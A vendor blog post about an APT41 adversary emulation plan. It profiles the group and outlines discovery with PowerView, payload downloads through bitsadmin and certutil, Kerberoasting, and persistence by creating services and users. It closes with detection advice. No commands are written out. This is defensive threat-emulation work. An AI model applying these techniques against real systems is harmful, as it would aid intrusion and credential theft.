Welcome to another week of #ThreatThursday. This week we leverage an adversary emulation plan created and shared to the community by a third party: APT41 Emulation Plan. As usual, we will cover Cyber Threat Intelligence, create a threat actor profile, create an adversary emulation plan from the work done by Huy, share the plan in our Github, explain some of the new TTPs we will leverage, and discuss how to defend against APT41. We hope you enjoy.
APT41 is a Chinese actor first seen active in 2012 and has been observed in a broad ranging campaign through 2020. Its intent has been both for state-sponsored espionage as well as for financial reasons. After exploitation, APT leverages sophisticated TTPs and even deploys additional payloads with multiple different methods such as bitsadmin and certutil. It also looks to evade defenses and establish persistence, making it an incredibly dangerous piece of malware.
Cyber Threat Intelligence Sources:
Many of these TTPs have been discussed in previous #ThreatThursdays so we want to focus on some new ones. In the adversary emulation part section we will discuss:
After reviewing the Cyber Threat Intelligence reports and MITRE ATT&CK mapping, we organized the TTPs by Tactic and created a threat profile for APT41:
As usual, we created and shared the APT41 adversary emulation plan on our Github in both ATT&CK Navigator JSON and SCYTHE Threat JSON. In this emulation plan, we broke down the threat into different steps: discovery, execution, defense evasion, persistence, credential access, and clean up. We also added threat automation language to check if the payload is running with high integrity (administrative privilege). If it is running with privilege, it takes additional steps than if it is not running with privilege.
APT41 leverages the well-known powershell script for host, network, and domain situational awareness (also known as reconnaissance or discovery) called PowerView.ps1 There are multiple ways to download and execute this script in memory but in this case, we are going to download the script to the disk and then call the script to run various commandlets it provides:
APT41 uses two well known living off the land binaries and scripts. These are binaries signed by Microsoft that come with the operating system and have some added functionality. In the adversary emulation plan, we use bitsadmin and certutil to download two well-known powershell scripts for Kerberoasting and Domain Enumeration.
To maintain our non-destructive philosophy of emulation, we showed the ability to download example payloads and execute PowerShell commands without necessarily running anything malicious. To show a proof of concept for persistence, we chose to add example registry keys, services, and tasks so that they would be easily distinguishable and removable.
All of the above steps for persistence may be done by a user with limited privileges. We have added a check to the adversary emulation plan to determine the integrity of the process, if it is a high integrity process, then it performs other persistence and credential access TTPs that require administrative privileges:
After all the automation for APT41 is run, there are cleanup steps to remove the proof of concept persistence methods created by earlier actions.
While APT41 has quite the span of discovery, persistence, and evasion techniques, it also has a few specific key areas that can inform a security team on how to defend against it.
APT41 has a few methods of downloading additional payloads: powershell, certutil, and bitsadmin. These are known as living off the land binaries and scripts. These are binaries signed by Microsoft that come with the operating system. Preventing their execution is very difficult so it is best to enable detection and alerting controls when they are used to access external resources.
APT41 has been observed to use various publicly available PowerShell scripts by downloading them onto the endpoint and then executing them. In this adversary emulation plan we download the following to disk:
In this case, we did not modify the scripts, creating detection for the exact script known to be used by malicious actors may be an easy and effective way to detect this activity. There are many ways around it but this detection is a start.
An alarming method that APT41 does to establish persistence on a victim is that it will look to create a user. To defend against this would require a group policy to disallow users from creating another user. Another method of persistence that is even more specific to APT41 is that it looks to create a service called “StorSyncSvc”. Detecting this service creation immediately (if the malware had somehow elevated privileges) would help defend against it.
While APT41 is quite the sophisticated actor, we can still ingest the Cyber Threat Intelligence, map it to MITRE ATT&CK, and create an adversary emulation plan that covers much of the behavior of the threat. More importantly, this emulation can aid in developing methods of preventing and detecting this threat through its specific and unique behaviors. We hope you enjoyed this edition of #ThreatThursday.
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.
SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, visit https://scythe.io, or follow on Twitter @scythe_io.